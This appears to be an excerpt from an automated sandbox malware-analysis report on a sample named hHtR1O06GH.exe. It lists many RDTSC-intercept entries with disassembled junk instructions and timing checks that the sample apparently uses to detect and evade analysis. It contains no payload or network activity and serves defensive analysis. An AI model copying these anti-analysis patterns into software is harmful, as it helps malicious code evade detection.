Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1141186 second address: 11411BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FE66CCE6063h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FE66CCE6061h 0x00000014 pushad 0x00000015 popad 0x00000016 push edx 0x00000017 pop edx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114143E second address: 114145B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114145B second address: 1141465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114744B second address: 1147451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1147451 second address: 1147455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1145E0A second address: 1145E18 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE66CFB4FD8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1145E18 second address: 1145E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CCE6069h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1145E35 second address: 1145E82 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE66CFB4FD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FE66CFB4FE9h 0x00000014 jbe 00007FE66CFB4FD6h 0x0000001a jmp 00007FE66CFB4FE8h 0x0000001f jnc 00007FE66CFB4FD6h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1145E82 second address: 1145E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1145E88 second address: 1145E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1145E8C second address: 1145E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E502B second address: 10E5046 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 10E5046 second address: 10E504B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11465BE second address: 11465D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FE66CFB4FD8h 0x0000000b je 00007FE66CFB4FDEh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1146774 second address: 1146778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114E575 second address: 114E57B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114E57B second address: 114E592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CCE6063h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114EA09 second address: 114EA11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114FA63 second address: 114FA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jng 00007FE66CCE6058h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007FE66CCE6056h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114FA7E second address: 114FA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114FA82 second address: 114FA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 114FD33 second address: 114FD39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1154217 second address: 115421B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115421B second address: 1154236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE66CFB4FE3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1154236 second address: 1154260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6067h 0x00000007 jmp 00007FE66CCE605Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11535CE second address: 11535D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153A04 second address: 1153A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE66CCE6066h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153A2E second address: 1153A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007FE66CFB4FF2h 0x0000000d jmp 00007FE66CFB4FE6h 0x00000012 js 00007FE66CFB4FD6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jno 00007FE66CFB4FD6h 0x00000020 jnp 00007FE66CFB4FD6h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153BB8 second address: 1153BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153BBC second address: 1153BC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153BC2 second address: 1153BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153BC8 second address: 1153BDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153BDE second address: 1153BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FE66CCE6056h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jl 00007FE66CCE6056h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153DB2 second address: 1153DBC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE66CFB4FDCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153DBC second address: 1153DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007FE66CCE606Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007FE66CCE6056h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153DD6 second address: 1153DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153F45 second address: 1153F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153F49 second address: 1153F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153F53 second address: 1153F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1153F57 second address: 1153F5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115EA60 second address: 115EA75 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE66CCE6058h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FE66CCE6062h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115EFEF second address: 115F005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FDDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F005 second address: 115F036 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE66CCE6061h 0x0000000f jmp 00007FE66CCE6066h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F036 second address: 115F089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FE66CFB4FE5h 0x00000010 jmp 00007FE66CFB4FE4h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE66CFB4FDEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F089 second address: 115F08F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F377 second address: 115F382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FE66CFB4FD6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F382 second address: 115F394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F394 second address: 115F39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F39C second address: 115F3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jo 00007FE66CCE6092h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F3AD second address: 115F3CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FE66CFB4FE1h 0x0000000f ja 00007FE66CFB4FD6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F3CE second address: 115F3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F541 second address: 115F545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F545 second address: 115F54F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE66CCE6056h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F964 second address: 115F968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F968 second address: 115F96E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F96E second address: 115F97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FE66CFB4FD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F97E second address: 115F982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 115F982 second address: 115F986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1160037 second address: 116004B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE66CCE6056h 0x00000008 jp 00007FE66CCE6056h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 116004B second address: 116004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 116004F second address: 1160055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 116801D second address: 1168021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1168021 second address: 1168027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1167D35 second address: 1167D52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1167D52 second address: 1167D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1176952 second address: 1176970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FE66CFB4FD6h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FE66CFB4FDDh 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11763DD second address: 11763E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11763E1 second address: 11763EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11796C3 second address: 11796C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11796C7 second address: 117970A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE66CFB4FE4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FE66CFB4FDEh 0x00000010 pop edi 0x00000011 push edx 0x00000012 jmp 00007FE66CFB4FE5h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 117926D second address: 1179277 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE66CCE6062h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1179277 second address: 117927D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 117927D second address: 1179285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 109BF64 second address: 109BF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1194116 second address: 1194137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 119427A second address: 119427E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 119427E second address: 1194284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11947E8 second address: 11947EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11947EC second address: 11947FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11947FF second address: 1194805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1198F66 second address: 1198F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1198F6B second address: 1198F76 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FE66CFB4FD6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1198F76 second address: 1198F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1198F83 second address: 1198F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1198F89 second address: 1198F98 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1198F98 second address: 1198F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 1198F9D second address: 1198FA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11A8E44 second address: 11A8E4E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE66CFB4FD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11A8E4E second address: 11A8E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007FE66CCE6056h 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11A5708 second address: 11A570C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11A570C second address: 11A572C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE66CCE6068h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11A572C second address: 11A5734 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11A5734 second address: 11A574A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CCE6062h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11B7FFE second address: 11B8006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11B8006 second address: 11B800A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11BAC30 second address: 11BAC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FE66CFB4FD6h 0x0000000a jmp 00007FE66CFB4FE5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11BAC4F second address: 11BAC53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 11BA959 second address: 11BA969 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FE66CFB4FDAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
